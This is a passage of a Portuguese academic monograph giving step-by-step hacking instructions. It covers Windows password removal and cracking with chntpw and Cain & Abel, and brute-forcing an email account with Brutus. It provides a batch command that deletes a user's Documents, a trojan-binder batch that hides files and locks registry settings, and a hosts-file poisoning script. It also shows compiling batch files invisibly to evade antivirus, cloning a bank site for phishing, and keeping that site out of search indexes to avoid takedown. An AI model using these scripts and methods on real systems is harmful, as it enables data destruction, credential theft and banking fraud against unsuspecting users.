  • 36. 36 chntpw -i media/teste/WINDOWS/system32/config/SAM Caso não ocorra nenhum imprevisto, e o comando acima seja digitado corretamente (levando em consideração letras maiúsculas e minúsculas), resultados conforme a imagem seguinte deverão aparecer. Opções para alterar o sistema Windows. Figura 11 Para apagar a senha de um usuário do sistema, a primeira opção deve ser selecionada. Caso a tecla “enter” seja pressionada sem a escolha de nenhuma opção, automaticamente a primeira será escolhida. Após a escolha da primeira opção, será exibida uma lista com todos os usuários que possuem uma conta no sistema e informações como, por exemplo, se a conta está habilitada, bloqueada, o código em número hexadecimal do Relative-Identifier (RID) e se a conta possui privilégios de administrador. Para alterar a senha de algum usuário, basta digitar seu respectivo nome. Caso nenhum nome de usuário e nenhum RID sejam digitados, o usuário “Administrador” será automaticamente selecionado se a tecla “enter” for pressionada. A figura seguinte ilustra como as opções de alteração de contas de usuários são
  • 37. 37 apresentadas pelo programa. Opções para alterar senhas dos usuários. Figura 12 Como é possível visualizar na figura acima, o programa também exibe informações sobre as políticas de senha do sistema e oferece opções para a alteração de contas de usuário. Ao selecionar a primeira opção “Edit user data and passwords”, o aplicativo faz uma listagem das contas de usuários (quadro vermelho). As contas que aparecem com a opção “dis/lock” estão bloqueadas ou desabilitadas. Após digitar o nome de um usuário ou seu respectivo RID em número hexadecimal, será exibida uma tela com a qual será possível concluir a exclusão de senha de usuário. A ilustração a seguir destaca com setas vermelhas as opções que devem ser selecionadas para excluir com sucesso a senha de algum usuário do sistema.
  • 38. 38 Como é possível verificar no exemplo abaixo, após a mensagem de sucesso apresentada pelo aplicativo, em condições normais, basta salvar as alterações para que a operação seja realizada com êxito. Finalização do processo de exclusão de senha. Figura 13 3.3.4 Descobrir senhas sem alterá-las O procedimento de descoberta de senha, além de mais vantajoso para um cracker ou pessoa com más intenções, é bastante diferente e mais trabalhoso que a simples exclusão ou troca de senha. (ASSUNÇÃO, 2002, p.55) Para exemplificar um processo simples de quebra de senhas, foi utilizado o programa “Cain & Abel v4.9.36” e os arquivos “SAM” e “system” de um sistema Windows XP Media
  • 39. 39 Center com o Service Pack 2. Durante a elaboração desta monografia, este procedimento também foi testado nos sistemas operacionais mais atuais da Microsoft, funcionando sem problemas. Também a fim de exemplificar a obtenção dos arquivos de senha sem a necessidade de utilizar um Live-CD ou outra forma de iniciar o sistema, foi utilizado o programa “FTK Imager v2.5.3.14”. Qualquer forma de obtenção dos arquivos pode ser utilizada, porém, o procedimento descrito abaixo pode ser útil para sistemas com dados criptografados ou que possuem senhas no sistema básico de entrada e saída (BIOS) e não permitem a inicialização a partir de um dispositivo móvel. A obtenção dos arquivos de senha com o sistema ainda em execução é possível com a utilização de programas para recuperação de arquivos excluídos, como o “NTFS Reader” ou, como na imagem abaixo, o “FTK Imager”. Obter arquivos “SAM” e “system” com o sistema em execução. Figura 14 Após obter os arquivos que contêm informações sobre as senhas, a pessoa com a intenção de descobri-las pode abrir os arquivos “SAM” e “system” com o programa “Cain & Abel” e escolher um dos métodos de quebra de senhas disponíveis.
  • 40. 40 A imagem abaixo ilustra as etapas realizadas para carregar os arquivos do sistema. Após a realização das etapas, serão carregadas informações sobre todos os usuários do sistema. Utilização do Cain. Figura 15 Este aplicativo oferece três opções para descobrir senhas de contas de usuários: ataque de dicionário, força bruta e Rainbow Tables. Um ataque de dicionário é baseado em uma lista (arquivo de texto) que contém uma grande quantidade de possíveis senhas. Pode ser um método extremamente rápido e eficiente caso um bom arquivo de dicionário (wordlist) seja utilizado. Uma Wordlist, além de comprada ou baixada da internet, pode ser criada por programas como o “DCM” e o “Wordlist Producer” (TOMPSON, 2004, p159). O ataque de força bruta, por sua vez, tenta todas as combinações possíveis entre caracteres previamente escolhidos. Para armazenar as senhas dos usuários, o Windows utiliza uma sequência de números hexadecimais (hash) para dificultar o processo de descoberta de senhas. O hash das senhas é obtido através de um complexo cálculo matemático, o que aumenta significativamente o tempo necessário para descobrir as senhas. Visando a diminuição deste tempo, arquivos
  • 41. 41 contendo uma lista de hashs já calculados (também conhecidos como Rainbow Tables) frequentemente são utilizados com o intuito de diminuir o tempo do processo. Para a criação de Rainbow Tables, podem ser utilizadas ferramentas como o “Winrtgen”, parte integrante do “Cain & Abel v4.9.36”. No exemplo abaixo é utilizado um ataque de força bruta que, apesar de ser um método que pode levar horas ou até mesmo anos (dependendo da complexidade da senha e poder de processamento) ainda é bastante eficiente, além de não necessário nenhum arquivo de dicionário ou Rainbow Table para utilizá-lo. Força bruta com o Cain. Figura 16 O “Cain & Abel” é uma poderosa ferramenta capaz de, entre outras coisas, descobrir senhas de diversos sistemas por diferentes métodos. Senhas com menos de oito caracteres podem ser descobertas com facilidade em menos de um dia. Neste exemplo, o programa levou menos de um segundo para revelar uma senha de quatro dígitos (extremamente fraca). Na figura anterior é possível verificar (círculo vermelho) que o aplicativo indica as possíveis
  • 42. 42 senhas com menos de oito dígitos. Crackeando. Figura 17 O tempo de processamento que é necessário para a descoberta das senhas é aumentado exponencialmente, caso a senha contenha caracteres especiais e seja composta por mais do que sete caracteres. Segundo as estimativas de tempo feitas pelo software utilizado, uma senha que possui caracteres especiais e cerca de quatorze dígitos, pode demorar até três anos para ser quebrada em um computador comum com processador “Core 2 Duo” de 2,3 GHz. 3.3.4.1 Senhas armazenadas no computador Senhas armazenadas no computador, em sua grande maioria, são facilmente decifradas e não exigem tempo e processamento. O próprio “Cain & Abel” é capaz de decifrar, entre outras senhas, as armazenadas no navegador de internet, senhas de redes sem fio e senhas de e-mails armazenadas.
  • 43. 43 De forma extremamente rápida é possível visualizar todas as senhas de e-mails de todos os usuários do computador ou todas as senhas de redes sem fio, como na figura a seguir. Senhas das redes sem fio já acessadas. Figura 18 3.3.4.2 Invasão de contas de e-mail e sites por meio da senha Há diversas maneiras de descobrir a senha de um e-mail. Um método que não se baseia diretamente em erros cometidos por parte do usuário do e-mail é utilizar ferramentas que tentam acessar o e-mail com diversas senhas até decifrá-la (THOMPSON, 2004, p.150). O “Brutus” é um programa capaz de descobrir senhas de sistemas acessados através do protocolo Hipertext Transfer Protocol (HTTP), File Transfer Protocol (FTP.) – útil para invasão de sites –, Post Office Protocol – protocolo de e-mail –, entre outros. Para exemplificar a quebra de senha de uma conta de e-mail, o endereço eletrônico “papainoel3@yahoo.com.br” foi especialmente criado para este fim.
  • 44. 44 Na tela principal da segunda versão do programa “Brutus”, apenas alguns itens são necessários configurar para a realização da tentativa de ataque. Brutus. Figura 19 Como o nome sugere, o “Brutus” suporta ataques de força bruta, porém, neste exemplo, foi utilizada uma wordlist. Wordlist. Figura 20
  • 45. 45 A palavra “feliznatal” foi incluída na lista de palavras e corresponde à senha do e-mail. Quando a utilização de wordlists é feita, a descoberta da senha somente é possível se na lista de palavras existir a senha correta, fato que leva à conclusão de que a utilização de uma boa wordlist é fundamental para o sucesso do procedimento. Na figura a seguir, é possível verificar a tela de sucesso de um ataque real feito à conta de e-mail “papainoel3@yahoo.com.br”. O aplicativo tentou acessar a conta com as palavras que estavam na wordlist até encontrar a sequência de caracteres correspondente à senha correta. Quebra de senha de e-mail. Figura 21 Os dados utilizados no ataque como o servidor de e-mail (POP3) e a respectiva porta (a porta110 é utilizada por padrão) foram obtidos sem dificuldades ao digitar “configurar outlook yahoo” em um site de busca na internet.
  • 46. 46 Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker pode utilizar esta mesma ferramenta, apenas com configurações diferentes. Além de uma boa wordlist, o sucesso do ataque a um site também vai depender de uma boa configuração das opções “connections” e “timeout”. Invasão de site. Figura 22 A obtenção dos dados do servidor também pode ser feita através de sites de busca, com a procura de páginas que contêm termos como “acessar ftp nome do local de hospedagem”. Para saber onde o site está hospedado, basta pesquisar o domínio em sites como o “http://www.whois.net/”. Após a obtenção da senha, para acessar o conteúdo do site a ser invadido, é possível utilizar ferramentas dos próprios provedores de hospedagem (quando disponíveis) ou utilizar programas como o “FileZilla” para visualizar, copiar, excluir ou modificar arquivos do site. Em boa parte dos provedores de hospedagem, a senha do Secure Shell (SSH) é a mesma senha do servidor FTP. Nestes casos, é possível fazer a utilização de programas como o “PuTTY” para manipular, além do conteúdo do servidor FTP, o banco de dados do site.
  • 47. 47 4 Técnicas que demandam conhecimentos básicos Neste capítulo, são abordadas técnicas que, para executá-las, é necessário possuir conhecimentos básicos na área de informática ou, pelo menos, a leitura dos tópicos anteriores. Os códigos dos programas e de arquivos de execução em lote contidos nesta pesquisa foram desenvolvidos exclusivamente para esta monografia e suas finalidades se limitam às acadêmicas. 4.1 Criação de um programa para fins maliciosos Para criar um programa de computador, evidentemente, é de extrema importância e quase que indispensável possuir conhecimentos em linguagens de programação, porém, este conhecimento não é um requisito obrigatório. Atualmente, códigos prontos de vírus são distribuídos e, com apenas algumas modificações, o código pode tornar-se personalizado. É possível encontrar até mesmo sites especializados em automatizar o processo de desenvolvimento de vírus para computadores, o que criou um novo predicado dentro da categoria dos hackers iniciantes: os “apertadores de botão”, termo que faz alusão aos botões “Next, Next e Finish” (RUFINO, 2002, p.23). 4.1.2 Arquivos de processamento em lote (batch) Além de modificar códigos criados por outras pessoas, também é possível, a partir de técnicas bem difundidas na internet, executar tarefas maliciosas com poucas linhas de comandos. Um exemplo de como isso pode ser feito em um sistema Windows é abrir o conhecido bloco de notas, digitar sem as aspas “del %homepath%Documents*.* /f/s/q” e salvar o arquivo com a extensão “.bat”. Se for executado, todos os arquivos que estiverem na pasta “Meus Documentos” serão excluídos. Um batch como o do exemplo acima, pode trazer um grande problema, caso documentos importantes sejam apagados. Outro aspecto interessante dos arquivos de processamento em lote é que dificilmente eles são bloqueados por programas antivírus, permitindo sua distribuição via e-mail com maior facilidade (basta colocar em uma pasta compactada), se comparados a programas comuns. A partir de um arquivo de batch é possível executar diversos programas, processar
  • 48. 48 comandos específicos e condicionais, o que faz de um arquivo de processamento em lote um programa completo. O código abaixo é um programa completo (composto exclusivamente de comandos disponíveis nas versões mais atuais dos sistemas operacionais da Microsoft) cujas funções são: programar o computador para desligar, reiniciar, desligar computadores remotamente, entre outras funções correlatas. Para fazer uso dele, não é necessário nenhum compilador ou programa adicional. É preciso somente digitar os comandos abaixo em algum editor de texto qualquer, salvar com a extensão “.bat” e executá-lo. rem Programa para desligar o computador rem Autor: Pedro Ramos @echo off color 1e title Programa que desliga o computador :Inicio cls echo. echo 1.Desligar echo 2.Reiniciar echo 3.Desligar ou reiniciar outro computador da rede echo 4.Fazer logoff echo 5.Hibernar echo 6.Cancelar desligamento echo 7.Sair deste programa echo. set /p escolha=Escolha uma tarefa(1,2,3,4,5,6 ou 7): if %escolha%==1 goto desligar if %escolha%==2 goto reiniciar if %escolha%==3 shutdown -i if %escolha%==4 shutdown -l if %escolha%==5 shutdown -h if %escolha%==6 shutdown -a if %escolha%==7 exit goto Inicio :desligar
  • 49. 49 cls set /p seg=Tempo para o Desligamento (em segundos): set /p msg=Digite uma mensagem de desligamento: set /p force=Forcar desligamento (s/n): if %force%==s set f=-f if not %force%==s set f= shutdown -s -t %seg% -c "%msg%" %f% goto cancelar :reiniciar cls set /p prog=Reiniciar com os programas atuais (somente para windows 7)(s/n): if %prog%==s set r=-g if not %prog%==s set r=-r set /p seg=Tempo para o reinicio (em segundos): set /p msg=Digite uma mensagem: set /p force=Forcar reinicio (s/n): if %force%==s set f=-f if not %force%==s set f= shutdown %r% -t %seg% -c "%msg%" %f% :cancelar cls echo 1.Cancelar tarefa atual echo 2.Voltar para a tela principal echo 3.Sair do programa set /p opcao=Escolha uma tarefa (1,2 ou 3): if %opcao%==1 shutdown -a if %opcao%==2 goto Inicio if %opcao%==3 exit goto cancelar
  • 50. 50 Os resultados obtidos com a execução do programa são similares aos da imagem a seguinte. Screenshots do batch. Figura 23 Nesta monografia, o programa é útil para demonstrar as inúmeras possibilidades de manipulação do sistema que um arquivo de execução em lotes pode oferecer. Por exemplo, caso algum comando que execute atividades maliciosas seja inserido nas primeiras linhas do programa, ele será acionado e, dependendo do código, não aparecerá nada na tela nem influenciará no funcionamento do aplicativo. 4.1.2.1 Compilar um arquivo de processamento em lotes Uma das maiores desvantagens de utilizar um simples batch para disseminar vírus de computadores, ou induzir algum usuário a executar atividades que ele não deseja, é o fato de o arquivo poder ser aberto em qualquer editor de texto e ter seu código visualizado e estudado por completo. Uma forma de corrigir este problema é transformar o arquivo de processamento em lotes em um executável do tipo “.exe”. Com a finalidade de exemplificar o processo, serão discutidas as funcionalidades do programa “Bat To Exe Converter v1.5”. Após o arquivo de processamento em lotes ser criado, resta apenas carregá-lo com o “Bat To Exe Converter”, escolher o diretório onde o novo arquivo executável será salvo e clicar em “Compile” para criar um arquivo não visualizável em qualquer editor de texto.
  • 51. 51 Na imagem abaixo, é possível verificar que a opção “Invisible application” foi selecionada, o que significa que o novo programa “apagar arquivos.exe” será executado de forma imperceptível para o usuário. Compilar batch. Figura 24 4.1.3 Como um vírus pode ser anexado a outro arquivo Diversos aplicativos, como o “Senna Spy EXE Maker 2001” e o “Cactus Joiner“, podem ser utilizados para anexar um vírus a outro arquivo qualquer – como uma foto ou vídeo – e executar o vírus de forma invisível para o usuário. O “Cactus Joiner“, por exemplo, oferece até mesmo permissões para abrir portas no firewall de forma automática. O sistema operacional Windows também possui um programa nativo que é capaz de
  • 52. 52 realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado em versões mais recentes do Windows com o comando “iexpress”. O “Winrar”, programa amplamente conhecido e normalmente utilizado para compactar ou descompactar arquivos, também possui opções pouco utilizadas ou conhecidas que permitem anexar um vírus a um arquivo qualquer e executá-lo de forma invisível. No exemplo subsequente, será exemplificada uma forma de criar um aplicativo que o qual, ao mesmo tempo em que executa um programa legítimo criado por outrem, de forma transparente, executa um programa malicioso (Malware) que insere uma foto de uma caveira como papel de parede da área de trabalho do Windows de uma maneira que não é possível removê-la a menos que o registro do Windows seja editado. Para esta tarefa, também pode ser utilizado o programa “Bat To Exe Converter” com a escolha de algumas opções personalizadas. Neste exemplo, será adicionado o programa “instalar papel de parede.bat” e a imagem “caveira.jpg” (que ficará como o papel de parede) ao editor de textos “Atlantis.exe”. O conteúdo do arquivo de execução em lotes é o seguinte: @echo off rem Criado para fins acadêmicos por Pedro Ramos @mkdir %homepath%Windows @move /y caveira.jpg %homepath%WindowsSystem.jpg @attrib +R +S +H %homepath%WindowsSystem.jpg @reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v Wallpaper /t REG_SZ /d "%homepath%WindowsSystem.jpg" /f @reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v WallpaperStyle /t REG_SZ /d 2 /f @start Atlantis.exe Há sete linhas de comando no arquivo (cada linha de comando começa com”@”) que são suficientes para, de forma transparente, criar um diretório chamado “Windows” na pasta do usuário que executar o programa, inserir o arquivo de imagem que servirá de plano de fundo na área de trabalho (renomeado para “System.jpg”) dentro do novo diretório, ocultar e proteger o novo arquivo, inserir alterações no registro para definir o papel de parede impedindo ele seja alterado e, por último, executar o aplicativo original (Atlantis.exe).
  • 53. 53 Ao escolher a opção “Invisible application”, somente o batch será executado de forma “transparente”, ou seja, o editor de textos “Atlantis” será executado e funcionará normalmente, o que permite que o programa possa ser executado diversas vezes pelo usuário sem que ele suspeite da integridade do arquivo. Executar de forma invisível. Figura 25 Diversas outras opções são disponibilizadas pelo aplicativo e podem ser utilizadas de acordo com a função do novo programa desenvolvido. A opção “Encrypt the program”, por exemplo, pode ser útil quando a intenção é camuflar um vírus já conhecido e evitar que ele seja detectado pelo programa antivírus. A inclusão de quaisquer arquivos como programas, imagens e vídeos pode ser feita ao clicar na aba “Include”.
  • 54. 54 Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa que registra as imagens da tela e as teclas digitadas pelo usuário (image keylogger) também pode ser adicionado, possibilitando a captura de senhas de contas bancárias digitadas em teclados virtuais, por exemplo. Incluir quaisquer arquivos ao programa. Figura 26 Caso seja necessário deixar o novo programa com a aparência bem parecida à do original, a aba “Versioninformations” oferece algumas opções. Incluir ícone. Figura 27
  • 55. 55 Após compilado, o resultado será o seguinte: Comparação de arquivos. Figura 28 É possível verificar que o arquivo gerado pelo programa é pouco maior que o original, pois contém uma foto e um arquivo de batch. O ícone utilizado também é pouco diferente, porém, nada impede que um ícone idêntico seja utilizado. 4.2 DNS spoofing O DNS, acrônimo de (Domain Name System), é um recurso utilizado para “traduzir” nomes de computadores/servidores para seu real endereço lógico (endereço IP). Por exemplo, o servidor que armazena o site de buscas “Google” possui um endereço (algo como “72.14.253.104”) que o permite ser localizado na internet. Memorizar este endereço pode não ser uma das tarefas mais simples quando se tratar de vários sites na internet, cada um com um endereço diferente. Além disso, mesmo que o endereço de e-mail “mario@129.2.69.24” seja memorizado, caso ocorra uma mudança de servidor de correio eletrônico (por tornar-se obsoleto, por exemplo) o endereço de e-mail será modificado. Para resolver esse problema foram criadas listas contendo os nomes dos servidores e seus respectivos endereços (TANENBAUM, 2003, p. 439). O DNS spoofing, é a técnica que consiste em manipular os registros de DNS de forma que a conexão seja direcionada para um local diferente do original. Há diversas maneiras de manipular registros de DNS e, uma das mais conhecidas é manipular um arquivo chamado “hosts”, presente em boa parte dos sistemas operacionais.
  • 56. 56 O código a seguir é um exemplo de como pode ser criado um arquivo de processamento em lotes para manipular o arquivo “hosts” dos sistemas operacionais mais atuais da Microsoft. ipconfig /flushdns echo. >>%systemroot%System32driversetchosts echo 74.6.239.84 www.google.com>>%systemroot%System32driversetchosts echo 74.6.239.84 www.google.com.br>>%systemroot%System32driversetchosts Conforme visto nos capítulos anteriores, o código acima pode ser digitado em um editor de texto qualquer e, após ser salvo com a extensão “.bat”, pode ser compilado para executar de forma invisível e anexado a outro arquivo íntegro. Após sua execução, toda vez que o usuário tentar acessar o site de buscas “www.google.com.br” ou “www.google.com”, será direcionado para o site de buscas do “Yahoo” do Reino Unido e Irlanda do Norte, cujo endereço atual é “74.6.239.84”. A figura abaixo foi originada de um ataque experimental real. Redirecionamento do site. Figura 29
  • 57. 57 É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereços ainda continua a mostrar o endereço que o usuário desejava acessar. Da mesma forma que foi possível direcionar para o “Yahoo”, um usuário que tentava acessar o “Google”, um código semelhante ao que foi apresentado há pouco pode ser utilizado para direcionar um usuário que queira acessar sua conta bancária ao computador de um cracker ou servidor por ele manipulado. Caso um usuário seja direcionado para um site falso de uma instituição financeira e o site for bem feito, dificilmente a pessoa a ser enganada desconfiará de uma fraude. Caso o usuário que executar o arquivo malicioso tenha permissões de administrador do sistema, dificilmente o direcionamento dos endereços não obterá êxito ou será bloqueado por um firewall ou antivírus. 4.3 Fraude em contas bancárias A invasão de contas bancárias talvez seja um dos golpes mais temidos por quem faz uso da tecnologia para movimentações financeiras pela internet. Só no Brasil, estima-se que cerca de 32,5 milhões de pessoas utilizam a internet para realizar transações bancárias (VALLE, 2010). Um ataque que atinja apenas um por cento deste público, afetará mais de 300 mil pessoas. Mesmo que seja um ataque mal elaborado e de fácil percepção por parte do usuário do sistema, caso consiga enganar apenas 0,01 por cento das pessoas afetadas pelo ataque, mais de trinta usuários da internet poderão ter seu dinheiro roubado. Uma grande variedade de técnicas é utilizada para cometer crimes digitais que envolvem instituições financeiras. Algumas delas já são bem conhecidas, por grande parte das empresas e usuários da internet, o que leva à conclusão de que, para um criminoso realizar um ataque com sucesso, a combinação de técnicas é o modo mais eficiente. Mesmo com grande investimento em segurança de informação feito por parte das instituições financeiras, dificilmente é possível debelar crackers tenazes, o que leva a crer que o investimento em conscientização dos usuários é uma boa medida de segurança. 4.3.1 Pharming Um site falso é, atualmente, uma das ferramentas mais utilizadas por criminosos da área de informática para enganar usuários da internet que acessam sites de instituições financeiras. Uma das razões para a crescente prática desse tipo de crime é a facilidade com
  • 58. 58 que um site original pode ser copiado e a grande quantidade de usuários que são facilmente induzidos a acessá-los. Dependendo da forma como foi desenvolvido e de sua complexidade, muitas vezes é possível copiá-lo de forma integral, o que dificulta a percepção de que o site é falso. Até mesmo sites mais complexos, como sites de instituições financeiras e comércios eletrônicos, são passíveis de cópia. Qualquer usuário da internet que utilize um navegador comum como o “Internet Explorer” pode tentar. Para exemplificar como isso pode ser feito, foi copiado o site de uma instituição financeira. No navegador “Internet Explorer” foi digitado o seguinte endereço: “www.bb.com.br”. No menu “arquivos”, escolheu-se a opção “Salvar como...” Salvar site. Figura 30 Após a escolha da opção “Salvar como...”, uma nova janela foi aberta com uma mensagem dizendo que a página não poderia ser completamente salva e perguntando: “Gostaria de salvar a página mesmo assim?”. Após clicar em “Sim” para a resposta à pergunta, uma nova janela conforme a figura a seguir foi aberta.
  • 59. 59 Após o site ser copiado, foi aberto o arquivo “[bb_com_br].htm” e a página da instituição foi exibida. Página WEB completa. Figura 31 Até mesmo as fotos que estavam no site foram copiadas, como é possível verificar na imagem a seguir. Site falso. Figura 32 Nem todos os arquivos podem ser baixados desta maneira e a perfeição de um site falso dependerá inteiramente da habilidade que o cracker tem em desenvolver sites, além de sua criatividade para modificar os itens que ele não consegue copiar com perfeição. Na imagem
  • 60. 60 do site falso, é possível verificar que os botões de menu que ficam logo abaixo dos locais onde são inseridos os dados de agência e conta ficaram defeituosos. Muitos usuários não suspeitariam que o site é falso somente por este motivo. Ainda assim, um cracker com conhecimentos básicos de desenvolvimento de sites poderia facilmente consertar o problema. As telas seguintes, que servem para a autenticação de um usuário em sua conta corrente, também podem ser falsificadas por um bom desenvolvedor de sites (Web Disigner), inclusive os teclados virtuais. É pertinente ressaltar, também, que um cracker não precisa desenvolver um site por completo, pois é possível utilizar informações do site oficial e repassá-las para o usuário em tempo real, conforme abordado em capítulos posteriores. Após copiar e modificar o site para ter sua aparência mais parecida possível com o site original, o cracker pode armazená-lo em um computador qualquer ou hospedá-lo em sites no exterior. Algumas vezes são utilizadas contas falsas em sites gratuitos de hospedagem de sites, a fim de aumentar a anonimidade do criminoso. Um site falso, exposto ao público da internet, rapidamente pode ser detectado e tirado do ar (principalmente se for um site falso de uma grande instituição). Para evitar que o site seja retirado do ar, um cracker pode utilizar diversos meios como, por exemplo, permitir que somente endereços específicos (de clientes do banco) consigam acessar o site ou, em outros casos, impedir somente que robôs dos sites de busca indexem o conteúdo do site. Para impedir que os robôs dos sites de busca acessem o site, pode ser adicionada uma linha dentro da página que contém o código fonte do site. O conteúdo abaixo é um exemplo do que pode ser adicionado nas páginas com código fonte do site. <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"> Caso o cracker tenha a intenção de não ter seu site indexado pelos sites de busca, também é possível criar um arquivo chamado “robots.txt” com o conteúdo abaixo e colocá-lo no diretório-raiz do site. Conteúdo do arquivo “robots.txt”: User-agent: * Disallow: / Após a criação e hospedagem do site falso, o criminoso pode utilizar, entre outras técnicas, a engenharia social para convencer o usuário a clicar em um link falso que remeta ao site fake ou o DNS spoofing (abordado em capítulos anteriores) para que o cliente da instituição financeira seja automaticamente direcionado ao site falso.